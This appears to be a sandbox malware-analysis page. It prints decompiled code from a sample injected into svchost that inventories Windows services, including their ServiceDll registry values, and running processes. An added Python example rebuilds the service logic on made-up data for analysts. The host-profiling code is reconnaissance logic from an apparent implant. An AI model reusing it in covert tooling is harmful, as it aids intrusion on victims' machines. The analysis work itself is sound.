                                                            				_t540 = _t541 - 0xc30;
                                                            				_t542 = _t541 - 0xd30;
                                                            				_t394 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t395 = _t394 ^ _t542;
                                                            				 *(_t540 + 0xc10) = _t395;
                                                            				r13d = 0;
                                                            				 *((intOrPtr*)(_t542 + 0x5c)) = r13d;
                                                            				r8d = 0xf003f;
                                                            				 *((intOrPtr*)(_t542 + 0x54)) = r13d;
                                                            				 *((intOrPtr*)(_t542 + 0x58)) = r13d;
                                                            				OpenSCManagerW(??, ??, ??);
                                                            				 *(_t540 - 0x68) = _t395;
                                                            				if (_t395 == 0) goto 0xaf546074;
                                                            				 *(_t542 + 0x48) = _t565;
                                                            				 *((long long*)(_t542 + 0x40)) = _t542 + 0x58;
                                                            				_t10 = _t565 + 3; // 0x3
                                                            				r9d = _t10;
                                                            				 *((long long*)(_t542 + 0x38)) = _t542 + 0x54;
                                                            				_t13 = _t565 + 0x30; // 0x30
                                                            				r8d = _t13;
                                                            				_t398 = _t542 + 0x5c;
                                                            				 *(_t542 + 0x30) = _t398;
                                                            				 *((intOrPtr*)(_t542 + 0x28)) = r13d;
                                                            				 *(_t542 + 0x20) = _t565;
                                                            				__imp__EnumServicesStatusExW();
                                                            				if ( *((intOrPtr*)(_t542 + 0x5c)) != 0) goto 0xaf54607b;
                                                            				CloseServiceHandle(??);
                                                            				goto 0xaf5467e9;
                                                            				 *((long long*)(_t542 + 0xd50)) = __rsi;
                                                            				 *((long long*)(_t542 + 0xd58)) = __rdi;
                                                            				LocalAlloc(??, ??);
                                                            				 *(_t540 - 0x70) = _t398;
                                                            				_t523 = _t398;
                                                            				if (_t398 != 0) goto 0xaf5460b7;
                                                            				CloseServiceHandle(??);
                                                            				goto 0xaf5467d9;
                                                            				 *(_t542 + 0x48) = _t565;
                                                            				 *((long long*)(_t542 + 0x40)) = _t542 + 0x58;
                                                            				 *((intOrPtr*)(_t542 + 0x58)) = r13d;
                                                            				 *((long long*)(_t542 + 0x38)) = _t542 + 0x54;
                                                            				_t401 = _t542 + 0x5c;
                                                            				 *(_t542 + 0x30) = _t401;
                                                            				 *((intOrPtr*)(_t542 + 0x28)) = _t398 + 0x38;
                                                            				_t32 = _t499 + 3; // 0x3
                                                            				r9d = _t32;
                                                            				_t33 = _t499 + 0x30; // 0x30
                                                            				r8d = _t33;
                                                            				 *(_t542 + 0x20) = _t523;
                                                            				__imp__EnumServicesStatusExW();
                                                            				if (0 != 0) goto 0xaf546115;
                                                            				CloseServiceHandle(??);
                                                            				LocalFree(??);
                                                            				goto 0xaf5467d9;
                                                            				 *((long long*)(_t542 + 0xd60)) = __r12;
                                                            				 *((long long*)(_t542 + 0xd28)) = __r14;
                                                            				 *((long long*)(_t542 + 0xd20)) = __r15;
                                                            				LocalAlloc(??, ??);
                                                            				r14d = 1;
                                                            				 *(_t542 + 0x60) = _t401;
                                                            				 *((intOrPtr*)(_t542 + 0x50)) = r14d;
                                                            				 *_t401 = 0x87;
                                                            				LocalAlloc(??, ??);
                                                            				 *((intOrPtr*)(_t542 + 0x68)) = r13d;
                                                            				_t575 = _t401;
                                                            				LocalAlloc(??, ??);
                                                            				r8d = 0x208;
                                                            				_t563 = _t401;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 + 0x1c0, __rdx, _t523, _t544);
                                                            				 *((intOrPtr*)(_t542 + 0x74)) = r13d;
                                                            				if ( *((intOrPtr*)(_t542 + 0x54)) - r13d <= 0) goto 0xaf546784;
                                                            				 *_t563 = 0xaf586058;
                                                            				 *((long long*)(_t540 - 0x78)) = 0xaf586058;
                                                            				_t536 = _t401 * 0x38 + _t523;
                                                            				 *((long long*)(_t540 - 0x80)) = 0xaf586058;
                                                            				r8d = 1;
                                                            				 *((intOrPtr*)(_t542 + 0x70)) = 0xffffffff;
                                                            				 *((long long*)(_t540 - 0x58)) = _t536;
                                                            				OpenServiceW(??, ??, ??);
                                                            				if (_t401 == 0) goto 0xaf546299;
                                                            				r8d = 0x2000;
                                                            				if (QueryServiceConfigW(??, ??, ??, ??) == 0) goto 0xaf54625d;
                                                            				_t430 =  *((intOrPtr*)(_t575 + 0x10));
                                                            				 *((intOrPtr*)(_t542 + 0x70)) =  *((intOrPtr*)(_t575 + 4));
                                                            				_t402 =  *((intOrPtr*)(_t575 + 0x18));
                                                            				_t572 =  !=  ? _t430 : 0xaf586058;
                                                            				_t568 =  !=  ? _t402 : 0xaf586058;
                                                            				_t403 =  *((intOrPtr*)(_t575 + 0x28));
                                                            				_t525 =  !=  ? _t403 : 0xaf586058;
                                                            				 *((long long*)(_t540 - 0x78)) =  !=  ? _t403 : 0xaf586058;
                                                            				_t527 =  !=  ?  *((intOrPtr*)(_t575 + 0x30)) : 0xaf586058;
                                                            				 *((long long*)(_t540 - 0x80)) = 0xaf586058;
                                                            				r9d = 0x2000;
                                                            				 *(_t542 + 0x20) = _t542 + 0x68;
                                                            				__imp__QueryServiceConfig2W();
                                                            				if ( *_t563 != 0) goto 0xaf546290;
                                                            				 *_t563 = 0xaf586058;
                                                            				CloseServiceHandle(??);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 + 0x1c0, 0xaf586058, _t527, _t563);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 - 0x50, 0xaf586058, _t527, _t563);
                                                            				wsprintfW(??, ??);
                                                            				 *((intOrPtr*)(_t542 + 0x6c)) = 0x104;
                                                            				r8d = 0x104;
                                                            				E0000022B22BAF563830(__r14 + 0x3f, 0, _t350, _t367, _t540 - 0x50, L"SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", _t527,  *_t536);
                                                            				r9d = 0x20119;
                                                            				 *(_t542 + 0x20) = _t542 + 0x78;
                                                            				r8d = 0;
                                                            				 *(_t542 + 0x78) = _t527;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54638d;
                                                            				 *((long long*)(_t542 + 0x28)) = _t542 + 0x6c;
                                                            				r8d = 0;
                                                            				 *(_t542 + 0x20) = _t540 - 0x50;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t294 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t382 =  ==  ? 1 : 0;
                                                            				if (( ==  ? 1 : 0) == 0) goto 0xaf54638d;
                                                            				if ( *((intOrPtr*)(_t542 + 0x6c)) <= 0) goto 0xaf54638d;
                                                            				r8d = 0x104;
                                                            				ExpandEnvironmentStringsW(??, ??, ??);
                                                            				goto 0xaf5463f9;
                                                            				 *((short*)(_t540 - 0x50)) = 0;
                                                            				if (0xaf586058 == 0) goto 0xaf5463f5;
                                                            				_t410 = _t527;
                                                            				if ( *0xaf586058 != 0x22) goto 0xaf5463cb;
                                                            				_t321 =  *0x22BAF58605A & 0x0000ffff;
                                                            				if (_t321 == 0) goto 0xaf5463f0;
                                                            				if (_t321 == 0x22) goto 0xaf5463f0;
                                                            				 *(_t540 + _t410 * 2 - 0x50) = _t321;
                                                            				_t411 = _t410 + 1;
                                                            				if (_t411 - 0x208 < 0) goto 0xaf5463a7;
                                                            				goto 0xaf5463f5;
                                                            				r8d = 0xffdf;
                                                            				_t347 =  *0xaf586058 & 0x0000ffff;
                                                            				if ((r8w & _t347) == 0) goto 0xaf5463f0;
                                                            				 *(_t540 + _t411 * 2 - 0x50) = _t347;
                                                            				_t412 = _t411 + 1;
                                                            				if (_t412 - 0x208 < 0) goto 0xaf5463d1;
                                                            				goto 0xaf5463f5;
                                                            				 *((short*)(_t540 + _t412 * 2 - 0x50)) = 0;
                                                            				E0000022B22BAF5495D0(_t540 - 0x50, _t540 + 0x3d0, _t540, _t540 + 0x5e0, _t540 + 0x7f0, _t563);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				_t529 =  *((intOrPtr*)(_t540 - 0x78));
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				_t366 =  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536;
                                                            				LocalSize(??);
                                                            				if (_t412 - _t536 >= 0) goto 0xaf5464e1;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				_t418 = _t412;
                                                            				 *(_t542 + 0x60) = _t412;
                                                            				_t537 =  *((intOrPtr*)(_t540 - 0x58));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0( *((intOrPtr*)(_t542 + 0x50)), 0,  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536, _t367,  *_t537 + _t418,  *_t537,  *((intOrPtr*)(_t540 - 0x78)), _t537, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0( *_t537 + _t412 * 2, 0,  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536, _t367,  *((intOrPtr*)(_t537 + 8)) +  *(_t542 + 0x60),  *((intOrPtr*)(_t537 + 8)),  *((intOrPtr*)(_t540 - 0x78)), _t537, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0,  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536, _t367,  *_t563 +  *(_t542 + 0x60),  *_t563,  *((intOrPtr*)(_t540 - 0x78)), _t537, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				_t513 =  *(_t542 + 0x60);
                                                            				asm("movups xmm0, [esi+0x10]");
                                                            				asm("movups [ebx+edx], xmm0");
                                                            				asm("movups xmm1, [esi+0x20]");
                                                            				asm("movups [ebx+edx+0x10], xmm1");
                                                            				_t538 = _t513;
                                                            				 *((intOrPtr*)(_t418 + _t513 + 0x20)) =  *((intOrPtr*)(_t537 + 0x30));
                                                            				 *((intOrPtr*)(_t418 + _t513)) =  *((intOrPtr*)(_t542 + 0x70));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 0x2a, 0, _t366, _t367, 0xaf586058 + _t513, 0xaf586058, _t529, _t513, 2 + _t412 * 2);
                                                            				_t469 =  !=  ? _t430 : 0xaf586058;
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x1c0 + _t513, _t540 + 0x1c0, _t529, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, 0xaf586058 + _t538, 0xaf586058, _t529, _t538, 2 + _t412 * 2);
                                                            				_t475 =  !=  ? _t402 : 0xaf586058;
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t529 + _t538, _t529, _t529, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				_t530 =  *((intOrPtr*)(_t540 - 0x80));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367,  *((intOrPtr*)(_t540 - 0x80)) + _t538,  *((intOrPtr*)(_t540 - 0x80)),  *((intOrPtr*)(_t540 - 0x80)), _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x3d0 + _t538, _t540 + 0x3d0, _t530, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x5e0 + _t538, _t540 + 0x5e0, _t530, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x7f0 + _t538, _t540 + 0x7f0, _t530, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				r14d = _t418 + _t412 * 2;
                                                            				_t286 =  *((intOrPtr*)(_t542 + 0x74)) + 1;
                                                            				 *((intOrPtr*)(_t542 + 0x50)) = r14d;
                                                            				 *((intOrPtr*)(_t542 + 0x74)) = _t286;
                                                            				if (_t286 -  *((intOrPtr*)(_t542 + 0x54)) < 0) goto 0xaf5461b0;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				LocalFree(??);
                                                            				LocalFree(??);
                                                            				LocalFree(??);
                                                            				CloseServiceHandle(??);
                                                            				return E0000022B22BAF55A7C0(_t418 + _t412 * 2 + 2, _t412,  *(_t540 + 0xc10) ^ _t542);
                                                            			}
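The routine above walks the enumerated services, queries each one's configuration and description, then resolves the executable: a non-empty `ServiceDll` value under `SYSTEM\CurrentControlSet\Services\<name>\Parameters` wins and is only environment-expanded, otherwise the first token of `lpBinaryPathName` is taken (quoted token up to the closing quote, or unquoted up to the first space, capped at 0x208 characters), and the fields are appended to a growing record buffer tagged 0x87. The decompiled form hides that precedence behind `??` arguments and gotos, so the Python below is an added example written for this page, not code from the sample or from Joe Sandbox, that reimplements only the logic visible above. Assumptions: the registry and the environment are constructed dictionaries standing in for `RegOpenKeyExW`/`RegQueryValueExW` and `ExpandEnvironmentStringsW`; the `SERVICE_STATUS_PROCESS` copy and the helper `E0000022B22BAF5495D0`, whose purpose is not shown on this page, are left out; all type, field and function names and the sample services are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constants mirroring values visible in the decompiled routine.
RECORD_TAG = 0x87          # first word written into the output buffer
MAX_TOKEN_CHARS = 0x208    # loop bound of the quote/space copy loops
PARAMS_KEY = "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters"
EMPTY = ""                 # stands in for the L"" constant (0xaf586058)


@dataclass
class ServiceConfig:
    """Subset of QUERY_SERVICE_CONFIGW / SERVICE_CONFIG_DESCRIPTION the routine reads.
    (Example type, not a Windows structure.)"""
    name: str
    start_type: int
    binary_path: str
    load_order_group: Optional[str] = None
    dependencies: Optional[str] = None
    start_name: Optional[str] = None
    description: Optional[str] = None


def first_token(binary_path: str, limit: int = MAX_TOKEN_CHARS) -> str:
    """Reproduce the fallback branch's two copy loops.

    A leading '"' starts a copy that stops at the closing quote or NUL.
    Otherwise characters are copied while (c & 0xFFDF) != 0, i.e. until
    NUL or space (0x20).  Both loops stop after `limit` characters.
    """
    out: List[str] = []
    if binary_path[:1] == '"':
        for c in binary_path[1:]:
            if c in ("\0", '"'):
                break
            out.append(c)
            if len(out) >= limit:
                break
    else:
        for c in binary_path:
            if (ord(c) & 0xFFDF) == 0:
                break
            out.append(c)
            if len(out) >= limit:
                break
    return "".join(out)


def expand_env(value: str, env: Dict[str, str]) -> str:
    """Stand-in for ExpandEnvironmentStringsW: known %VAR% references are
    replaced, unknown ones are left untouched (env keys are upper-cased)."""
    return re.sub(r"%([^%]+)%",
                  lambda m: env.get(m.group(1).upper(), m.group(0)), value)


def resolve_image(cfg: ServiceConfig, registry: Dict[str, Dict[str, str]],
                  env: Dict[str, str]) -> str:
    """Precedence observed above: ServiceDll (only expanded, never tokenised)
    before the first token of lpBinaryPathName."""
    params = registry.get(PARAMS_KEY % cfg.name, {})
    service_dll = params.get("ServiceDll", "")
    if service_dll:                      # RegQueryValueExW succeeded, cbData > 0
        return expand_env(service_dll, env)
    return first_token(cfg.binary_path)


def build_inventory(configs: List[ServiceConfig],
                    registry: Dict[str, Dict[str, str]],
                    env: Dict[str, str]) -> List[dict]:
    """One record per service; NULL pointers collapse to "" exactly like the
    `!= ? ptr : L""` substitutions in the decompiled code."""
    records = []
    for cfg in configs:
        records.append({
            "tag": RECORD_TAG,
            "name": cfg.name,
            "start_type": cfg.start_type,
            "binary_path": cfg.binary_path,
            "image": resolve_image(cfg, registry, env),
            "load_order_group": cfg.load_order_group or EMPTY,
            "dependencies": cfg.dependencies or EMPTY,
            "start_name": cfg.start_name or EMPTY,
            "description": cfg.description or EMPTY,
        })
    return records


# Constructed sample data (not taken from the analysed host).
SAMPLE_ENV = {"SYSTEMROOT": "C:\\Windows"}
SAMPLE_REGISTRY = {
    PARAMS_KEY % "Schedule": {"ServiceDll": "%SystemRoot%\\System32\\schedsvc.dll"},
}
SAMPLE_SERVICES = [
    ServiceConfig("Schedule", 2, "%SystemRoot%\\system32\\svchost.exe -k netsvcs",
                  start_name="LocalSystem", description="Task Scheduler"),
    ServiceConfig("FooAgent", 2, "C:\\Program Files\\Foo\\svc.exe --service"),
    ServiceConfig("BarSvc", 3, "C:\\Windows\\system32\\svchost.exe -k LocalService",
                  dependencies="RpcSs"),
]

if __name__ == "__main__":
    for rec in build_inventory(SAMPLE_SERVICES, SAMPLE_REGISTRY, SAMPLE_ENV):
        print(rec["name"], "->", rec["image"])
```

The second sample service shows why the token scan matters to an analyst: an unquoted path with spaces comes back as `C:\Program`, so unquoted service paths stand out in the inventory. The observable footprint of the real routine is the combination of `EnumServicesStatus`/`QueryServiceConfig(2)W` over every service with a read of `ServiceDll` under each service's `Parameters` key.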

                                                            Instruction addresses (IDA listing column, not aligned to the C-code above): 0x22baf545fd0 to 0x22baf546803


                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$Local$AllocCloseHandle$EnumOpenQueryServicesStatus$ConfigConfig2FreeManagerwsprintf
                                                            • String ID: SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                            • API String ID: 3781266245-2144606380
                                                            • Opcode ID: 9d6868b7212e53bdaed3ab9efab12b3820a6fc241d769bc0c4cbb1eb04b2dbc9
                                                            • Instruction ID: 7210e50ad068ed2b987311fea38c339920aff62f73fe4172409d7754d19d81a2
                                                            • Opcode Fuzzy Hash: 9d6868b7212e53bdaed3ab9efab12b3820a6fc241d769bc0c4cbb1eb04b2dbc9
                                                            • Instruction Fuzzy Hash: 06327133600B95A6EF21DFA5E85C3DE73A1FB88B85F410425DA4A47B6AEF39D509C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E0000022B22BAF548150(void* __ebx, void* __esi, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                                            				void* __rbp;
                                                            				void* __r12;
                                                            				void* __r15;
                                                            				signed int _t137;
                                                            				int _t146;
                                                            				int _t147;
                                                            				int _t148;
                                                            				int _t188;
                                                            				void* _t210;
                                                            				signed char _t214;
                                                            				void* _t235;
                                                            				void* _t241;
                                                            				signed long long _t265;
                                                            				signed long long _t266;
                                                            				intOrPtr _t267;
                                                            				void* _t268;
                                                            				signed long long _t270;
                                                            				intOrPtr _t271;
                                                            				void* _t272;
                                                            				intOrPtr _t274;
                                                            				signed int _t278;
                                                            				intOrPtr _t296;
                                                            				void* _t297;
                                                            				signed char _t330;
                                                            				void* _t331;
                                                            				long _t359;
                                                            				void* _t360;
                                                            				void* _t362;
                                                            				signed long long _t363;
                                                            				int _t378;
                                                            				long _t381;
                                                            				void* _t383;
                                                            				int _t386;
                                                            				signed long long _t387;
                                                            				signed long long _t388;
                                                            
                                                            				_t365 = __r8;
                                                            				_t357 = __rsi;
                                                            				_t353 = __rdi;
                                                            				 *((long long*)(_t362 + 8)) = __rbx;
                                                            				 *((long long*)(_t362 + 0x10)) = __rsi;
                                                            				 *((long long*)(_t362 + 0x18)) = __rdi;
                                                            				_t360 = _t362 - 0xc10;
                                                            				_t363 = _t362 - 0xd10;
                                                            				_t265 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t266 = _t265 ^ _t363;
                                                            				 *(_t360 + 0xc00) = _t266;
                                                            				r8d = 0x238;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t363 + 0x30, __rdx, __rdi, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x1b0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x3c0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x5d0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x7e0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x9f0, __rdx, _t353, _t365);
                                                            				 *((long long*)(_t360 + 0x188)) = 7;
                                                            				r12d = 0;
                                                            				 *(_t360 + 0x180) = _t378;
                                                            				 *(_t360 + 0x170) = r12w;
                                                            				__imp__CreateToolhelp32Snapshot();
                                                            				 *(_t363 + 0x28) = _t266;
                                                            				if (_t266 == 0xffffffff) goto 0xaf548667;
                                                            				 *(_t363 + 0x30) = 0x238;
                                                            				LocalAlloc(_t386);
                                                            				_t387 = _t266;
                                                            				_t20 = _t378 + 1; // 0x1
                                                            				r13d = _t20;
                                                            				 *_t266 = 0x80;
                                                            				if (Process32FirstW(_t383) == 0) goto 0xaf548649;
                                                            				r8d =  *(_t363 + 0x38);
                                                            				OpenProcess(_t381, _t378, _t359);
                                                            				_t137 =  *(_t363 + 0x38);
                                                            				if ((_t137 & 0xfffffff3) != 0) goto 0xaf5482a9;
                                                            				if (_t137 != 0xc) goto 0xaf54862a;
                                                            				E0000022B22BAF547A60(_t266, _t360 + 0x1b0, 0xffffffff, __rsi, _t360, _t378, _t387);
                                                            				E0000022B22BAF5495D0(_t360 + 0x1b0, _t360 + 0x5d0, _t360, _t360 + 0x7e0, _t360 + 0x9f0, _t378);
                                                            				E0000022B22BAF5478C0(_t266, _t266, _t360 + 0x3c0);
                                                            				 *((intOrPtr*)(_t363 + 0x24)) = r12d;
                                                            				LoadLibraryA(??);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t266 == 0) goto 0xaf548319;
                                                            				 *_t266();
                                                            				_t214 =  *(_t363 + 0x38);
                                                            				 *((intOrPtr*)(_t363 + 0x20)) = r12d;
                                                            				__imp__ProcessIdToSessionId();
                                                            				E0000022B22BAF536CE0( *(_t363 + 0x38), _t360 + 0x190, _t357, _t360 + 0x9f0);
                                                            				E0000022B22BAF5489C0(_t214, _t266, _t360 + 0x170, _t266, _t357);
                                                            				_t267 =  *((intOrPtr*)(_t360 + 0x1a8));
                                                            				if (_t267 - 8 < 0) goto 0xaf5483ac;
                                                            				_t296 =  *((intOrPtr*)(_t360 + 0x190));
                                                            				_t268 = _t267 + 1;
                                                            				if (_t268 - 0xffffffff > 0) goto 0xaf548708;
                                                            				if (_t268 + _t268 - 0x1000 < 0) goto 0xaf5483a7;
                                                            				if ((_t214 & 0x0000001f) != 0) goto 0xaf548702;
                                                            				_t270 =  *((intOrPtr*)(_t296 - 8));
                                                            				if (_t270 - _t296 >= 0) goto 0xaf5486fc;
                                                            				_t297 = _t296 - _t270;
                                                            				if (_t297 - 8 < 0) goto 0xaf5486f6;
                                                            				if (_t297 - 0x27 > 0) goto 0xaf5486f0;
                                                            				0xaf55a85c();
                                                            				_t278 =  *(_t360 + 0x180);
                                                            				_t146 = lstrlenW(??);
                                                            				_t147 = lstrlenW(??);
                                                            				_t148 = lstrlenW(??);
                                                            				_t240 = _t146 + _t147 + _t148 + lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				LocalSize(??);
                                                            				if (_t270 - _t278 >= 0) goto 0xaf548439;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				_t388 = _t270;
                                                            				r13d = r13d + 4;
                                                            				 *(_t387 + _t388) =  *(_t363 + 0x38);
                                                            				 *((intOrPtr*)(_t381 + _t388)) =  *((intOrPtr*)(_t363 + 0x50));
                                                            				r13d = r13d + 4;
                                                            				 *((intOrPtr*)(_t381 + _t388)) =  *((intOrPtr*)(_t363 + 0x4c));
                                                            				r13d = r13d + 4;
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(r13d, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t363 + 0x5c + _t388, _t363 + 0x5c, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t270 * 2 + r13d, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t360 + 0x1b0 + _t388, _t360 + 0x1b0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				_t347 =  >=  ?  *(_t360 + 0x170) : _t360 + 0x170;
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t360 + 0x1b0 + _t388,  >=  ?  *(_t360 + 0x170) : _t360 + 0x170, 0xffffffff, _t357, 2 +  *(_t360 + 0x180) * 2);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t360 + 0x3c0 + _t388, _t360 + 0x3c0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				 *((intOrPtr*)(_t278 + _t388)) =  *((intOrPtr*)(_t363 + 0x20));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 6, _t235, _t240, _t241, _t360 + 0x5d0 + _t388, _t360 + 0x5d0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t240, _t241, _t360 + 0x7e0 + _t388, _t360 + 0x7e0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t240, _t241, _t360 + 0x9f0 + _t388, _t360 + 0x9f0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				r13d = _t278 + _t270 * 2;
                                                            				 *((intOrPtr*)(_t381 + _t388)) =  *((intOrPtr*)(_t363 + 0x24));
                                                            				r13d = r13d + 4;
                                                            				_t188 = CloseHandle(??);
                                                            				__imp__Process32NextW();
                                                            				if (_t188 != 0) goto 0xaf548280;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				CloseHandle(??);
                                                            				_t271 =  *((intOrPtr*)(_t360 + 0x188));
                                                            				if (_t271 - 8 < 0) goto 0xaf5486b7;
                                                            				_t330 =  *(_t360 + 0x170);
                                                            				_t272 = _t271 + 1;
                                                            				if (_t272 - 0xffffffff > 0) goto 0xaf5486ea;
                                                            				if (_t272 + _t272 - 0x1000 < 0) goto 0xaf5486b2;
                                                            				if (( *(_t360 + 0x170) & 0x0000001f) != 0) goto 0xaf54870e;
                                                            				_t274 =  *((intOrPtr*)(_t330 - 8));
                                                            				if (_t274 - _t330 >= 0) goto 0xaf548714;
                                                            				_t331 = _t330 - _t274;
                                                            				if (_t331 - 8 < 0) goto 0xaf54871a;
                                                            				if (_t331 - 0x27 > 0) goto 0xaf548720;
                                                            				0xaf55a85c();
                                                            				return E0000022B22BAF55A7C0(_t278 + _t270 * 2 + 2, _t270,  *(_t360 + 0xc00) ^ _t363);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$_invalid_parameter_noinfo_noreturn$Local$Alloc$ProcessWindow$CloseHandleProcess32Size$AddressCreateFirstLibraryLoadNextOpenProcSessionSnapshotTextThreadToolhelp32Visible
                                                            • String ID: IsWow64Process$kernel32.dll
                                                            • API String ID: 535452645-3024904723
                                                            • Opcode ID: 865c3783c3390c4822a7b71a95ef26ab696b4c125f10d315e7a9f238e33b693b
                                                            • Instruction ID: 1cdcc23a023fed7d043ebc8dcd034d53a1c12f6558e95e491c46d85dbcdaafb7
                                                            • Opcode Fuzzy Hash: 865c3783c3390c4822a7b71a95ef26ab696b4c125f10d315e7a9f238e33b693b
                                                            • Instruction Fuzzy Hash: 5D02C533610685A6EF36EFA4E85C3DE33A1F788789F444911DA5A4779AEF3AC205C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
